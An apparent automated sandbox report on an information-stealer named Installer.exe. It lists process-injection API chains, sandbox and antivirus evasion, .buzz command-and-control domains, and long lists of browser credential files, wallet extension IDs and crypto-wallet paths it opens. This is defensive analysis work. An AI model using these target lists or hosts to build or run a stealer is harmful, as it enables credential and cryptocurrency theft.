                Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522783205.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1874516417.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522659058.0000000003512000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1835883384.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000003.1738807223.000000000355F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Installer.exe | API call chain: ExitProcess graph end node graph_3-14591
                Source: C:\Users\user\Desktop\Installer.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 3_2_0043EBA0 LdrInitializeThunk
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0034F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0037A19E mov edi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00341FB0 mov edi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00341FB0 mov edi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0035D8E0 GetProcessHeap
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0034F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0034F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0034F8DD SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_00357E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_0034F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_0034F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_0034F8DD SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 2_2_00357E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_0037A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread
                Source: C:\Users\user\Desktop\Installer.exe | Memory written: C:\Users\user\Desktop\Installer.exe base: 400000 value starts with: 4D5A
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hummskitnj.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: cashfuzysao.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: appliacnesot.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: screwamusresz.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: inherineau.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: scentniej.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: rebuildeso.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: prisonyfork.buzz
                Source: Installer.exe, 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: mindhandru.buzz
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Process created: C:\Users\user\Desktop\Installer.exe "C:\Users\user\Desktop\Installer.exe"
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 0_2_0035D1BD
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW 0_2_00361287
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 0_2_003614D8
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW 0_2_00361580
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 0_2_003617D3
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 0_2_00361840
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 0_2_00361915
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 0_2_00361960
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP 0_2_00361A07
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 0_2_00361B0D
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 0_2_0035CC15
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 2_2_0035D1BD
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW 2_2_00361287
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 2_2_003614D8
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW 2_2_00361580
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 2_2_003617D3
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 2_2_00361840
                Source: C:\Users\user\Desktop\Installer.exe | Code function: EnumSystemLocalesW 2_2_00361915
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 2_2_00361960
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP 2_2_00361A07
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 2_2_00361B0D
                Source: C:\Users\user\Desktop\Installer.exe | Code function: GetLocaleInfoW 2_2_0035CC15
                Source: C:\Users\user\Desktop\Installer.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Installer.exe | Code function: 0_2_003500B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime
                Source: C:\Users\user\Desktop\Installer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Installer.exe, 00000003.00000003.1874516417.00000000035AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %\Windows Defender\MsMpeng.exe
                Source: Installer.exe, 00000003.00000002.3522659058.000000000353B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Installer.exe, 00000003.00000003.1973390326.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 00000003.00000002.3522806645.00000000035AD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: er\MsMpeng.exe
                Source: C:\Users\user\Desktop\Installer.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: Installer.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: Installer.exe, 00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Installer.exe, 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\Installer.exe | File opened (browser profile data and extension stores, in the order the report lists them):
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\Installer.exe | File opened (FTP client and note-taking application data):
    C:\Users\user\AppData\Roaming\FTPGetter
    C:\Users\user\AppData\Roaming\FTPInfo
    C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
    C:\Users\user\AppData\Roaming\FTPbox
    C:\Users\user\AppData\Roaming\FTPRush
    C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
    C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\Installer.exe | File opened (cryptocurrency wallet data):
    C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
    C:\Users\user\AppData\Roaming\Ledger Live
    C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
    C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
    C:\Users\user\AppData\Roaming\Bitcoin\wallets
    C:\Users\user\AppData\Roaming\Binance
    C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
    C:\Users\user\AppData\Roaming\Electrum\wallets
    C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
    C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\Installer.exe | Directory queried (each queried repeatedly):
    C:\Users\user\Documents
    C:\Users\user\Documents\DTBZGIOOSO
    C:\Users\user\Documents\HTAGVDFUIE
    C:\Users\user\Documents\JSDNGYCOWY
    C:\Users\user\Documents\ONBQCLYSPU
    C:\Users\user\Documents\SQRKHNBNYN
    C:\Users\user\Documents\XZXHAVGRAG
Source: Yara match | File source: 00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1835591588.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1835776038.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1835675481.000000000355D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.1874516417.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Installer.exe PID: 7488, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Installer.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
ATT&CK techniques by tactic (the number in parentheses is the count the report shows next to a matched technique; techniques without a number were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (12); Native API (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1); Process Injection (211); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1); Virtualization/Sandbox Evasion (21); Process Injection (211); Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); File and Directory Discovery (11); System Information Discovery (33); Query Registry (1); Security Software Discovery (241); Virtualization/Sandbox Evasion (21); Process Discovery (1); Application Window Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Local System (41); Screen Capture (1); Clipboard Data (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
Installer.exe | 34% | ReversingLabs | Win32.Trojan.Generic |
Installer.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://lev-tolstoi.com/apix:Z | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/$5 | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/NVmA | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/espF | 100% | Avira URL Cloud | malware |
http://microsoft.coc. | 0% | Avira URL Cloud | safe |
https://lev-tolstoi.com/pi.W | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/apim | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/S | 100% | Avira URL Cloud | malware |
                                                                                                                                                          high
                                                                                                                                                          https://www.google.com/recaptcha/Installer.exe, 00000003.00000003.1715268906.000000000355F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
